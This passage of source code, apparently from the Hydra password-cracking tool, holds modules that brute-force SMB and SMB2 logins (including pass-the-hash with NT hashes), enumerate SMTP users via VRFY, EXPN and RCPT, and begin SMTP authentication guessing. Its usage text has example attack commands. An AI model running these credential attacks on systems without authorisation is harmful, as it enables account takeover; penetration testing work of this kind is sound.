1;\n }\n\n if (err) {\n if (verbose)\n hydra_report(stdout, \"[VERBOSE] requested line mode\\n\");\n accntFlag = 2;\n }\n } else if (strstr(miscptr, \"LOCAL\") != NULL) {\n accntFlag = 0; // LOCAL\n } else if (strstr(miscptr, \"DOMAIN\") != NULL) {\n accntFlag = 1; // DOMAIN\n }\n // check pass\n if (strstr(miscptr, \"HASH\") != NULL) {\n hashFlag = 1;\n } else if (strstr(miscptr, \"MACHINE\") != NULL) {\n hashFlag = 2;\n }\n // check auth\n if (strstr(miscptr, \"NTLMV2\") != NULL) {\n smb_auth_mechanism = AUTH_NTLMv2;\n } else if (strstr(miscptr, \"NTLM\") != NULL) {\n smb_auth_mechanism = AUTH_NTLM;\n } else if (strstr(miscptr, \"LMV2\") != NULL) {\n smb_auth_mechanism = AUTH_LMv2;\n } else if (strstr(miscptr, \"LM\") != NULL) {\n smb_auth_mechanism = AUTH_LM;\n }\n }\n if (verbose) {\n hydra_report(stdout, \"[VERBOSE] accntFlag is %d\\n\", accntFlag);\n hydra_report(stdout, \"[VERBOSE] hashFlag is %d\\n\", accntFlag);\n }\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n for (;;) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n\n if (port != 0) {\n sock = hydra_connect_tcp(ip, port);\n if (port == PORT_SMB) {\n protoFlag = WIN_NETBIOSMODE;\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Attempting NETBIOS mode.\\n\");\n } else {\n protoFlag = WIN2000_NATIVEMODE;\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Attempting WIN2K Native mode.\\n\");\n }\n } else {\n sock = hydra_connect_tcp(ip, PORT_SMBNT);\n if (sock > 0) {\n port = PORT_SMBNT;\n protoFlag = WIN2000_NATIVEMODE;\n } else {\n hydra_report(stderr, \"Failed to establish WIN2000_NATIVE mode. \"\n \"Attempting WIN_NETBIOS mode.\\n\");\n port = PORT_SMB;\n protoFlag = WIN_NETBIOSMODE;\n sock = hydra_connect_tcp(ip, PORT_SMB);\n }\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n if (NBSSessionRequest(sock) < 0) {\n fprintf(stderr, \"[ERROR] Session Setup Failed (is the server service running?)\\n\");\n hydra_child_exit(2);\n }\n next_run = SMBNegProt(sock);\n break;\n case 2: /* run the cracking function */\n next_run = start_smb(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code (%d), exiting!\\n\", run);\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n#endif\n\nint32_t service_smb_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n time_t ctime;\n int ready = 0, sock = hydra_connect_tcp(ip, port);\n unsigned char buf[] = {0x00, 0x00, 0x00, 0xbe, 0xff, 0x53, 0x4d, 0x42, 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x43, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9b, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4d,\n 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, 0x46, 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x20, 0x31, 0x2e, 0x30, 0x33, 0x00, 0x02, 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, 0x46, 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x20, 0x33, 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58,\n 0x30, 0x30, 0x32, 0x00, 0x02, 0x44, 0x4f, 0x53, 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x53, 0x61, 0x6d, 0x62, 0x61, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00};\n\n if (sock < 0) {\n fprintf(stderr, \"[ERROR] could not connect to target smb://%s:%d/\\n\", hostname, port);\n return -1;\n }\n\n if (send(sock, buf, sizeof(buf), 0) < 0) {\n fprintf(stderr, \"[ERROR] unable to send to target smb://%s:%d/\\n\", hostname, port);\n return -1;\n }\n\n ctime = time(NULL);\n do {\n usleepn(300);\n } while ((ready = hydra_data_ready(sock)) <= 0 && ctime + 5 >= time(NULL));\n\n if (ready <= 0) {\n fprintf(stderr, \"[ERROR] no reply from target smb://%s:%d/\\n\", hostname, port);\n return -1;\n }\n\n if ((ready = recv(sock, buf, sizeof(buf), 0)) < 40) {\n fprintf(stderr, \"[ERROR] invalid reply from target smb://%s:%d/\\n\", hostname, port);\n return -1;\n }\n\n close(sock);\n\n if (buf[37] == buf[38] && buf[38] == 0xff) {\n fprintf(stderr, \"[ERROR] target smb://%s:%d/ does not support SMBv1\\n\", hostname, port);\n return -1;\n }\n\n if ((buf[15] & 16) == 16) {\n fprintf(stderr,\n \"[ERROR] target smb://%s:%d/ requires signing which we do not \"\n \"support\\n\",\n hostname, port);\n return -1;\n }\n\n return 0;\n}\n\nvoid usage_smb(const char *service) {\n printf(\"Module smb default value is set to test both local and domain account, \"\n \"using a simple password with NTLM dialect.\\n\"\n \"Note: you can set the group type using LOCAL or DOMAIN keyword\\n\"\n \" or other_domain:{value} to specify a trusted domain.\\n\"\n \" you can set the password type using HASH or MACHINE keyword\\n\"\n \" (to use the Machine's NetBIOS name as the password).\\n\"\n \" you can set the dialect using NTLMV2, NTLM, LMV2, LM keyword.\\n\"\n \"Example: \\n\"\n \" hydra smb://microsoft.com -l admin -p tooeasy -m \\\"local lmv2\\\"\\n\"\n \" hydra smb://microsoft.com -l admin -p \"\n \"D5731CFC6C2A069C21FD0D49CAEBC9EA:2126EE7712D37E265FD63F2C84D2B13D::: -m \"\n \"\\\"local hash\\\"\\n\"\n \" hydra smb://microsoft.com -l admin -p tooeasy -m \"\n \"\\\"other_domain:SECONDDOMAIN\\\"\\n\\n\");\n}\n" }, { "path": "hydra-smb2.c", "content": "/**\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n *\n *\n * Copyright (C) 2021 Karim Kanso, all rights reserved.\n * kaz 'dot' kanso 'at' g mail 'dot' com\n */\n\n#if defined(LIBSMBCLIENT)\n\n#include \"hydra-mod.h\"\n\n#include \n#include \n#include \n#include \n#include \n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\n\ntypedef struct creds {\n const char *workgroup;\n const char *user;\n const char *pass;\n} creds_t;\n\nconst char default_workgroup[] = \"WORKGROUP\";\nbool use_nt_hash = false;\nconst char *workgroup = default_workgroup;\nconst char *netbios_name = NULL;\n\n#define EXIT_PROTOCOL_ERROR hydra_child_exit(2)\n#define EXIT_CONNECTION_ERROR hydra_child_exit(1)\n#define EXIT_NORMAL hydra_child_exit(0)\n\nvoid smb2_auth_provider(SMBCCTX *c, const char *srv, const char *shr, char *wg, int wglen, char *un, int unlen, char *pw, int pwlen) {\n creds_t *cr = (creds_t *)smbc_getOptionUserData(c);\n strncpy(wg, cr->workgroup, wglen);\n strncpy(un, cr->user, unlen);\n strncpy(pw, cr->pass, pwlen);\n wg[wglen - 1] = 0;\n un[unlen - 1] = 0;\n pw[pwlen - 1] = 0;\n}\n\nbool smb2_run_test(creds_t *cr, const char *server, uint16_t port) {\n SMBCCTX *ctx = smbc_new_context();\n if (ctx == NULL) {\n hydra_report(stderr, \"[ERROR] failed to create context\\n\");\n EXIT_PROTOCOL_ERROR;\n }\n // samba internal debugging will be dumped to stderr\n smbc_setDebug(ctx, debug ? 7 : 0);\n smbc_setOptionDebugToStderr(ctx, true);\n smbc_setFunctionAuthDataWithContext(ctx, smb2_auth_provider);\n smbc_setOptionUserData(ctx, cr);\n // 0 will use default port\n smbc_setPort(ctx, port);\n smbc_setOptionNoAutoAnonymousLogin(ctx, false);\n smbc_setOptionUseNTHash(ctx, use_nt_hash);\n if (netbios_name) {\n smbc_setNetbiosName(ctx, (char *)netbios_name);\n }\n\n ctx = smbc_init_context(ctx);\n if (!ctx) {\n hydra_report(stderr, \"[ERROR] smbc_init_context fail\\n\");\n smbc_free_context(ctx, 1);\n EXIT_PROTOCOL_ERROR;\n }\n\n char uri[2048];\n snprintf(uri, sizeof(uri) - 1, \"smb://%s/IPC$\", server);\n uri[sizeof(uri) - 1] = 0;\n if (verbose) {\n printf(\"[INFO] Connecting to: %s with %s\\\\%s%%%s\\n\", uri, cr->workgroup, cr->user, cr->pass);\n }\n SMBCFILE *fd = smbc_getFunctionOpendir(ctx)(ctx, uri);\n if (fd) {\n hydra_report(stderr, \"[WARNING] Unexpected open on IPC$\\n\");\n smbc_getFunctionClosedir(ctx)(ctx, fd);\n smbc_free_context(ctx, 1);\n fd = NULL;\n return true;\n }\n\n /*\n errno is set to 22 (EINVAL) when IPC$ as been opened but can not\n be opened like a normal share. This corresponds to samba error\n NT_STATUS_INVALID_INFO_CLASS, however this precise error code is\n not available outside of the library. Thus, instead the library\n sets a generic error (EINVAL) which can also correspond to other\n cases (see below test).\n\n This is not ideal, but appears to be the best that the\n libsmbclient library offers as detailed state information is\n internalised and not available. Further, it is also not possible\n from the api to separate the connection, authentication and\n authorisation.\n\n The following text is taken from the libsmbclient header file for\n the return value of the smbc_getFunctionOpendir function:\n\n Valid directory handle. < 0 on error with errno set:\n - EACCES Permission denied.\n - EINVAL A NULL file/URL was passed, or the URL would\n not parse, or was of incorrect form or smbc_init not\n called.\n - ENOENT durl does not exist, or name is an\n - ENOMEM Insufficient memory to complete the\n operation.\n - ENOTDIR name is not a directory.\n - EPERM the workgroup could not be found.\n - ENODEV the workgroup or server could not be found.\n\n */\n switch (errno) {\n case 0:\n // maybe false positive? unclear ... :( ... needs more testing\n smbc_free_context(ctx, 1);\n return true;\n break;\n case ENOENT:\n // Noticed this when connecting to older samba servers on linux\n // where any credentials are accepted.\n hydra_report(stderr, \"[WARNING] %s might accept any credential\\n\", server);\n case EINVAL: // 22\n // probably password ok, nominal case when connecting to a windows\n // smb server with good credentials.\n smbc_free_context(ctx, 1);\n return true;\n break;\n case EPERM:\n // Probably this means access denied inspite of mention above\n // about being related to wrong workgroup. I have observed\n // libsmbclient emitting this when connecting to a vanilla install\n // of Windows 2019 server (non-domain) with wrong credentials. It\n // appears related to a fallback null session being rejected after\n // the library tries with provided credentials. If the null\n // session is accepted, EACCES is returned.\n case EACCES:\n // 100% access denied\n break;\n case EHOSTUNREACH:\n case ETIMEDOUT:\n case ECONNREFUSED:\n // there are probably more codes that could be added here to\n // indicate connection errors.\n hydra_report(stderr, \"[ERROR] Error %s (%d) while connecting to %s\\n\", strerror(errno), errno, server);\n smbc_free_context(ctx, 1);\n EXIT_CONNECTION_ERROR;\n break;\n default:\n // unexpected error\n hydra_report(stderr, \"[ERROR] %s (%d)\\n\", strerror(errno), errno);\n smbc_free_context(ctx, 1);\n EXIT_PROTOCOL_ERROR;\n }\n\n smbc_free_context(ctx, 1);\n return false;\n}\n\nvoid service_smb2(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n static int first_run = 0;\n hydra_register_socket(sp);\n\n while (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT))) {\n char *login, *pass;\n\n if (first_run && hydra_options.conwait)\n sleep(hydra_options.conwait);\n\n login = hydra_get_next_login();\n pass = hydra_get_next_password();\n\n creds_t cr = {\n .user = login,\n .pass = pass,\n .workgroup = workgroup,\n };\n\n if (smb2_run_test(&cr, hydra_address2string(ip), port & 0xffff)) {\n hydra_completed_pair_found();\n } else {\n hydra_completed_pair();\n }\n\n first_run = 1;\n }\n EXIT_NORMAL;\n}\n\n// constants used by option parser\nconst char tkn_workgroup[] = \"workgroup:{\";\nconst char tkn_nthash_true[] = \"nthash:true\";\nconst char tkn_nthash_false[] = \"nthash:false\";\nconst char tkn_netbios[] = \"netbios:{\";\n\n#define CMP(s1, s2) (strncmp(s1, s2, sizeof(s1) - 1) == 0)\n\nint32_t service_smb2_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n if (!miscptr)\n return 0;\n\n while (*miscptr) {\n if (isspace(*miscptr)) {\n miscptr++;\n continue;\n }\n if (CMP(tkn_workgroup, miscptr)) {\n if (workgroup != default_workgroup) {\n // miscptr has already been processed, goto end\n miscptr += strlen(miscptr) + 1;\n continue;\n }\n miscptr += sizeof(tkn_workgroup) - 1;\n char *p = strchr(miscptr, '}');\n if (p == NULL) {\n hydra_report(stderr, \"[ERROR] missing closing brace in workgroup\\n\");\n return -1;\n }\n *p = '\\0';\n workgroup = miscptr;\n miscptr = p + 1;\n if (verbose || debug) {\n printf(\"[VERBOSE] Set workgroup to: %s\\n\", workgroup);\n }\n continue;\n }\n if (CMP(tkn_netbios, miscptr)) {\n if (netbios_name != NULL) {\n // miscptr has already been processed, goto end\n miscptr += strlen(miscptr) + 1;\n continue;\n }\n miscptr += sizeof(tkn_netbios) - 1;\n char *p = strchr(miscptr, '}');\n if (p == NULL) {\n hydra_report(stderr, \"[ERROR] missing closing brace in netbios name\\n\");\n return -1;\n }\n *p = '\\0';\n netbios_name = miscptr;\n miscptr = p + 1;\n if (verbose || debug) {\n printf(\"[VERBOSE] Set netbios name to: %s\\n\", netbios_name);\n }\n continue;\n }\n if (CMP(tkn_nthash_true, miscptr)) {\n miscptr += sizeof(tkn_nthash_true) - 1;\n use_nt_hash = true;\n if (verbose || debug) {\n printf(\"[VERBOSE] Enabled nthash.\\n\");\n }\n continue;\n }\n if (CMP(tkn_nthash_false, miscptr)) {\n miscptr += sizeof(tkn_nthash_false) - 1;\n use_nt_hash = false;\n if (verbose || debug) {\n printf(\"[VERBOSE] Disabled nthash.\\n\");\n }\n continue;\n }\n\n hydra_report(stderr, \"[ERROR] unable to parse: %s\\n\", miscptr);\n return -1;\n }\n\n return 0;\n}\n\nvoid usage_smb2(const char *service) {\n puts(\"Module is a thin wrapper over the Samba client library (libsmbclient).\\n\"\n \"Thus, is capable of negotiating v1, v2 and v3 of the protocol.\\n\"\n \"\\n\"\n \"As this relies on Samba libraries, the system smb.conf will be parsed\\n\"\n \"when library starts up. It is possible to add configuration options\\n\"\n \"into that file that affect this module (such as min/max supported\\n\"\n \"protocol version).\\n\"\n \"\\n\"\n \"Caution: due to the high-level libsmbclient api (compared the smb\\n\"\n \"Hydra module), the accuracy is reduced. That is, this module works by\\n\"\n \"attempting to open the IPC$ share, which is reported as an error,\\n\"\n \"e.g. try this with the smbclient tool and it will raise the\\n\"\n \"NT_STATUS_INVALID_INFO_CLASS error). Sadly, the level of feedback\\n\"\n \"from the api does not distinguish this error from general/unknown\\n\"\n \"errors, so it might be possible to have false positives due to this\\n\"\n \"fact. One example of this is when the library can not parse the uri\\n\"\n \"correctly. On the other hand, false negatives could occur when a\\n\"\n \"valid credential is unable to open the share due to access control,\\n\"\n \"e.g. a locked/suspended account.\\n\"\n \"\\n\"\n \"There are three module options available:\\n\"\n \" workgroup:{XXX} - set the users workgroup\\n\"\n \" netbios:{XXX} - set the recipients netbios name\\n\"\n \" nthash:true or nthash:false - threat password as an nthash\\n\"\n \"\\n\"\n \"Examples: \\n\"\n \" hydra smb2://abc.com -l admin -p xxx -m workgroup:{OFFICE}\\n\"\n \" hydra smb2://1.2.3.4 -l admin -p F54F3A1D3C38140684FF4DAD029F25B5 -m \"\n \"'workgroup:{OFFICE} nthash:true'\\n\"\n \" hydra -l admin -p F54F3A1D3C38140684FF4DAD029F25B5 \"\n \"'smb2://1.2.3.4/workgroup:{OFFICE} nthash:true'\\n\");\n}\n\n#endif // LIBSMBCLIENT\n" }, { "path": "hydra-smtp-enum.c", "content": "\n/*\n\ndavid: module used to enum smtp users with either\nVRFY, EXPN or RCPT TO command.\nOptional input could be set to\nVRFY, EXPN or RCPT to force the mode\n\nlogin will be used as the username\npasswd will be used as the domain name\n\n*/\n\n#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\nchar *err = NULL;\nint32_t tosent = 0;\n\n#define VRFY 0\n#define EXPN 1\n#define RCPT 2\n\nint32_t smtp_enum_cmd = VRFY;\n\nint32_t start_smtp_enum(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[500];\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n while (hydra_data_ready(s) > 0) {\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n free(buf);\n }\n\n if (smtp_enum_cmd == RCPT) {\n tosent = 0;\n if (pass != empty) {\n snprintf(buffer, sizeof(buffer), \"MAIL FROM: root@%s\\r\\n\", pass);\n } else {\n snprintf(buffer, sizeof(buffer), \"MAIL FROM: root\\r\\n\");\n }\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\", buf);\n /* good return values are something like 25x */\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"^25\\\\d\\\\s\")) {\n#else\n if (strstr(buf, \"25\") != NULL) {\n#endif\n if (pass != empty) {\n snprintf(buffer, sizeof(buffer), \"RCPT TO: %s@%s\\r\\n\", login, pass);\n } else {\n snprintf(buffer, sizeof(buffer), \"RCPT TO: %s\\r\\n\", login);\n }\n tosent = 1;\n } else {\n err = strstr(buf, \"Error\");\n if (err) {\n if (debug) {\n hydra_report(stderr, \"Server %s\", err);\n }\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n }\n }\n } else {\n char cmd[5] = \"\";\n\n memset(cmd, 0, sizeof(cmd));\n if (smtp_enum_cmd == EXPN)\n strcpy(cmd, \"EXPN\");\n else\n strcpy(cmd, \"VRFY\");\n if (pass != empty) {\n snprintf(buffer, sizeof(buffer), \"%s %s@%s\\r\\n\", cmd, login, pass);\n } else {\n snprintf(buffer, sizeof(buffer), \"%s %s\\r\\n\", cmd, login);\n }\n }\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\", buf);\n /* good return values are something like 25x */\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"^25\\\\d\\\\s\")) {\n#else\n if (strstr(buf, \"25\") != NULL) {\n#endif\n hydra_report_found_host(port, ip, \"smtp-enum\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n err = strstr(buf, \"Error\");\n if (err || tosent || strncmp(buf, \"50\", 2) == 0) {\n // we should report command not identified by the server\n // 502 5.5.2 Error: command not recognized\n // #ifdef HAVE_PCRE\n // if ((debug || hydra_string_match(buf,\n // \"\\\\scommand\\\\snot\\\\srecognized\")) && err) {\n // #else\n // if ((debug || strstr(buf, \"command\") != NULL) && err) {\n // #endif\n // hydra_report(stderr, \"Server %s\", err);\n // }\n if (strncmp(buf, \"500 \", 4) == 0 || strncmp(buf, \"502 \", 4) == 0) {\n hydra_report(stderr,\n \"[ERROR] command is disabled on the server (choose \"\n \"different method): %s\",\n buf);\n free(buf);\n return 4;\n }\n memset(buffer, 0, sizeof(buffer));\n // 503 5.5.1 Error: nested MAIL command\n strncpy(buffer, \"RSET\\r\\n\", sizeof(buffer));\n free(buf);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n }\n\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_smtp_enum(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1, i = 0;\n int32_t myport = PORT_SMTP, mysslport = PORT_SMTP_SSL;\n char *buffer = \"HELO hydra\\r\\n\";\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n /* receive initial header */\n if ((buf = hydra_receive_line(sock)) == NULL)\n hydra_child_exit(2);\n if (strstr(buf, \"220\") == NULL) {\n hydra_report(stderr, \"Warning: SMTP does not allow connecting: %s\\n\", buf);\n hydra_child_exit(2);\n }\n // while (strstr(buf, \"220 \") == NULL) {\n // free(buf);\n // buf = hydra_receive_line(sock);\n // }\n\n // if (buf[0] != '2') {\n if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {\n free(buf);\n hydra_child_exit(2);\n }\n // }\n\n free(buf);\n if ((buf = hydra_receive_line(sock)) == NULL)\n hydra_child_exit(2);\n if (buf[0] != '2') {\n hydra_report(stderr, \"Warning: SMTP does not respond correctly to HELO: %s\\n\", buf);\n hydra_child_exit(2);\n }\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n for (i = 0; i < strlen(miscptr); i++)\n miscptr[i] = (char)toupper((int32_t)miscptr[i]);\n\n if (strncmp(miscptr, \"EXPN\", 4) == 0)\n smtp_enum_cmd = EXPN;\n\n if (strncmp(miscptr, \"RCPT\", 4) == 0)\n smtp_enum_cmd = RCPT;\n }\n if (debug) {\n hydra_report(stdout, \"[VERBOSE] \");\n switch (smtp_enum_cmd) {\n case VRFY:\n hydra_report(stdout, \"using SMTP VRFY command\\n\");\n break;\n case EXPN:\n hydra_report(stdout, \"using SMTP EXPN command\\n\");\n break;\n case RCPT:\n hydra_report(stdout, \"using SMTP RCPT TO command\\n\");\n break;\n }\n }\n free(buf);\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_smtp_enum(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0) {\n sock = hydra_disconnect(sock);\n }\n hydra_child_exit(0);\n return;\n case 4: /* unsupported exit */\n if (sock >= 0) {\n sock = hydra_disconnect(sock);\n }\n hydra_child_exit(3);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_smtp_enum_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_smtp_enum(const char *service) {\n printf(\"Module smtp-enum is optionally taking one SMTP command of:\\n\\n\"\n \"VRFY (default), EXPN, RCPT (which will connect using \\\"root\\\" account)\\n\"\n \"login parameter is used as username and password parameter as the \"\n \"domain name\\n\"\n \"For example to test if john@localhost exists on 192.168.0.1:\\n\"\n \"hydra smtp-enum://192.168.0.1/vrfy -l john -p localhost\\n\\n\");\n}\n" }, { "path": "hydra-smtp.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\nextern char *HYDRA_EXIT;\nint32_t smtp_auth_mechanism = AUTH_LOGIN;\n\nchar *smtp_read_server_capacity(int32_t sock) {\n char *ptr = NULL;\n int32_t resp = 0;\n char *buf = NULL;\n\n do {\n if (buf != NULL)\n free(buf);\n ptr = buf = hydra_receive_line(sock);\n if (buf != NULL) {\n if (isdigit((int32_t)buf[0]) && buf[3] == ' ')\n resp = 1;\n else {\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n#ifdef NO_STRRCHR\n if ((ptr = rindex(buf, '\\n')) != NULL) {\n#else\n if ((ptr = strrchr(buf, '\\n')) != NULL) {\n#endif\n ptr++;\n if (isdigit((int32_t)*ptr) && *(ptr + 3) == ' ')\n resp = 1;\n }\n }\n }\n } while (buf != NULL && resp == 0);\n return buf;\n}\n\nint32_t start_smtp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\", *result = NULL;\n char *login, *pass, buffer[500], buffer2[500], *fooptr, *buf;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n while (hydra_data_ready(s) > 0) {\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n free(buf);\n }\n\n switch (smtp_auth_mechanism) {\n case AUTH_PLAIN:\n sprintf(buffer, \"AUTH PLAIN\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \"334\") == NULL) {\n hydra_report(stderr, \"[ERROR] SMTP PLAIN AUTH : %s\\n\", buf);\n if (strstr(buf, \"503\") != NULL) {\n free(buf);\n return 4;\n }\n free(buf);\n return 3;\n }\n free(buf);\n\n memset(buffer, 0, sizeof(buffer));\n result = sasl_plain(buffer, login, pass);\n if (result == NULL)\n return 3;\n\n char tmp_buffer[sizeof(buffer)];\n sprintf(tmp_buffer, \"%.250s\\r\\n\", buffer);\n strcpy(buffer, tmp_buffer);\n\n break;\n\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5: {\n int32_t rc = 0;\n char *preplogin;\n\n rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n if (rc) {\n return 3;\n }\n\n sprintf(buffer, \"AUTH CRAM-MD5\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n // get the one-time BASE64 encoded challenge\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \"334\") == NULL || strlen(buf) < 8) {\n hydra_report(stderr, \"[ERROR] SMTP CRAM-MD5 AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buf + 4);\n free(buf);\n\n memset(buffer2, 0, sizeof(buffer2));\n result = sasl_cram_md5(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n hydra_tobase64((unsigned char *)buffer, strlen(buffer), sizeof(buffer));\n\n char tmp_buffer[sizeof(buffer)];\n sprintf(tmp_buffer, \"%.250s\\r\\n\", buffer);\n strcpy(buffer, tmp_buffer);\n\n free(preplogin);\n } break;\n\n case AUTH_DIGESTMD5: {\n sprintf(buffer, \"AUTH DIGEST-MD5\\r\\n\");\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n // receive\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \"334\") == NULL) {\n hydra_report(stderr, \"[ERROR] SMTP DIGEST-MD5 AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n memset(buffer, 0, 